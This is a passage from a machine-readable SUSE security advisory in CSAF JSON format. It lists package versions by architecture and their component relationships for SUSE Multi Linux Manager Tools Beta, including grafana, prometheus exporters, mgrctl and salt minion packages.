"name": "grafana-11.6.11-159000.2.3.2.s390x",
"product": {
"name": "grafana-11.6.11-159000.2.3.2.s390x",
"product_id": "grafana-11.6.11-159000.2.3.2.s390x"
}
},
{
"category": "product_version",
"name": "mgrctl-5.2.5-159000.2.3.2.s390x",
"product": {
"name": "mgrctl-5.2.5-159000.2.3.2.s390x",
"product_id": "mgrctl-5.2.5-159000.2.3.2.s390x"
}
},
{
"category": "product_version",
"name": "prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"product": {
"name": "prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"product_id": "prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x"
}
},
{
"category": "product_version",
"name": "prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
"product": {
"name": "prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
"product_id": "prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x"
}
},
{
"category": "product_version",
"name": "python2-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"product": {
"name": "python2-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"product_id": "python2-uyuni-common-libs-5.2.3-159000.2.3.1.s390x"
}
},
{
"category": "product_version",
"name": "python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"product": {
"name": "python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"product_id": "python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x"
}
},
{
"category": "product_version",
"name": "saltbundlepy-m2crypto-0.45.1-159000.4.3.1.s390x",
"product": {
"name": "saltbundlepy-m2crypto-0.45.1-159000.4.3.1.s390x",
"product_id": "saltbundlepy-m2crypto-0.45.1-159000.4.3.1.s390x"
}
},
{
"category": "product_version",
"name": "venv-salt-minion-3006.0-159000.5.3.2.s390x",
"product": {
"name": "venv-salt-minion-3006.0-159000.5.3.2.s390x",
"product_id": "venv-salt-minion-3006.0-159000.5.3.2.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"product": {
"name": "Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"product_id": "Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64"
}
},
{
"category": "product_version",
"name": "firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"product": {
"name": "firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"product_id": "firewalld-prometheus-config-0.1-159000.4.3.2.x86_64"
}
},
{
"category": "product_version",
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
"product": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
"product_id": "golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64"
}
},
{
"category": "product_version",
"name": "golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"product": {
"name": "golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"product_id": "golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64"
}
},
{
"category": "product_version",
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"product": {
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"product_id": "golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
"product": {
"name": "golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
"product_id": "golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"product": {
"name": "golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"product_id": "golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64"
}
},
{
"category": "product_version",
"name": "golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"product": {
"name": "golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"product_id": "golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64"
}
},
{
"category": "product_version",
"name": "grafana-11.6.11-159000.2.3.2.x86_64",
"product": {
"name": "grafana-11.6.11-159000.2.3.2.x86_64",
"product_id": "grafana-11.6.11-159000.2.3.2.x86_64"
}
},
{
"category": "product_version",
"name": "mgrctl-5.2.5-159000.2.3.2.x86_64",
"product": {
"name": "mgrctl-5.2.5-159000.2.3.2.x86_64",
"product_id": "mgrctl-5.2.5-159000.2.3.2.x86_64"
}
},
{
"category": "product_version",
"name": "prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"product": {
"name": "prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"product_id": "prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64"
}
},
{
"category": "product_version",
"name": "prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"product": {
"name": "prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"product_id": "prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64"
}
},
{
"category": "product_version",
"name": "python2-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"product": {
"name": "python2-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"product_id": "python2-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64"
}
},
{
"category": "product_version",
"name": "python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"product": {
"name": "python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"product_id": "python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64"
}
},
{
"category": "product_version",
"name": "saltbundlepy-m2crypto-0.45.1-159000.4.3.1.x86_64",
"product": {
"name": "saltbundlepy-m2crypto-0.45.1-159000.4.3.1.x86_64",
"product_id": "saltbundlepy-m2crypto-0.45.1-159000.4.3.1.x86_64"
}
},
{
"category": "product_version",
"name": "venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"product": {
"name": "venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"product_id": "venv-salt-minion-3006.0-159000.5.3.2.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Multi Linux Manager Tools Beta SLE-15",
"product": {
"name": "SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15"
}
},
{
"category": "product_name",
"name": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5",
"product": {
"name": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-Micro-5"
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "dracut-saltboot-1.1.0-159000.2.2.1.noarch as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:dracut-saltboot-1.1.0-159000.2.2.1.noarch"
},
"product_reference": "dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch"
},
"product_reference": "dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "firewalld-prometheus-config-0.1-159000.4.3.2.aarch64 as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.aarch64"
},
"product_reference": "firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le"
},
"product_reference": "firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "firewalld-prometheus-config-0.1-159000.4.3.2.s390x as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.s390x"
},
"product_reference": "firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "firewalld-prometheus-config-0.1-159000.4.3.2.x86_64 as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.x86_64"
},
"product_reference": "firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64 as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64"
},
"product_reference": "golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le"
},
"product_reference": "golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x"
},
"product_reference": "golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64 as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64"
},
"product_reference": "golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64 as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64"
},
"product_reference": "golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le"
},
"product_reference": "golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x"
},
"product_reference": "golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64 as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64"
},
"product_reference": "golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64 as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64"
},
"product_reference": "golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le"
},
"product_reference": "golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x"
},
"product_reference": "golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64 as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64"
},
"product_reference": "golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64 as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64"
},
"product_reference": "golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le"
},
"product_reference": "golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x"
},
"product_reference": "golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64 as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64"
},
"product_reference": "golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64 as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64"
},
"product_reference": "golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le"
},
"product_reference": "golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x"
},
"product_reference": "golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64 as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64"
},
"product_reference": "golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64 as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64"
},
"product_reference": "golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le"
},
"product_reference": "golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x"
},
"product_reference": "golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64 as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64"
},
"product_reference": "golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-11.6.11-159000.2.3.2.aarch64 as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.aarch64"
},
"product_reference": "grafana-11.6.11-159000.2.3.2.aarch64",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-11.6.11-159000.2.3.2.ppc64le as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.ppc64le"
},
"product_reference": "grafana-11.6.11-159000.2.3.2.ppc64le",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-11.6.11-159000.2.3.2.s390x as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.s390x"
},
"product_reference": "grafana-11.6.11-159000.2.3.2.s390x",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-11.6.11-159000.2.3.2.x86_64 as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.x86_64"
},
"product_reference": "grafana-11.6.11-159000.2.3.2.x86_64",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgr-push-5.2.3-159000.2.3.1.noarch as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:mgr-push-5.2.3-159000.2.3.1.noarch"
},
"product_reference": "mgr-push-5.2.3-159000.2.3.1.noarch",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-5.2.5-159000.2.3.2.aarch64 as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.aarch64"
},
"product_reference": "mgrctl-5.2.5-159000.2.3.2.aarch64",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-5.2.5-159000.2.3.2.ppc64le as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.ppc64le"
},
"product_reference": "mgrctl-5.2.5-159000.2.3.2.ppc64le",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-5.2.5-159000.2.3.2.s390x as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.s390x"
},
"product_reference": "mgrctl-5.2.5-159000.2.3.2.s390x",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-5.2.5-159000.2.3.2.x86_64 as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.x86_64"
},
"product_reference": "mgrctl-5.2.5-159000.2.3.2.x86_64",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch"
},
"product_reference": "mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-lang-5.2.5-159000.2.3.2.noarch as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-lang-5.2.5-159000.2.3.2.noarch"
},
"product_reference": "mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch"
},
"product_reference": "mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64 as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64"
},
"product_reference": "prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le"
},
"product_reference": "prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x"
},
"product_reference": "prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64 as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64"
},
"product_reference": "prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64 as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64"
},
"product_reference": "prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le as component of SUSE Multi Linux Manager Tools Beta SLE-15",
"product_id": "SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le"
},
"product_reference": "prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"relates_to_product_reference": "SUSE Multi Linux Manager Tools Beta SLE-15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x as component of SUSE Multi Linux Manager Tools Beta SLE-15",
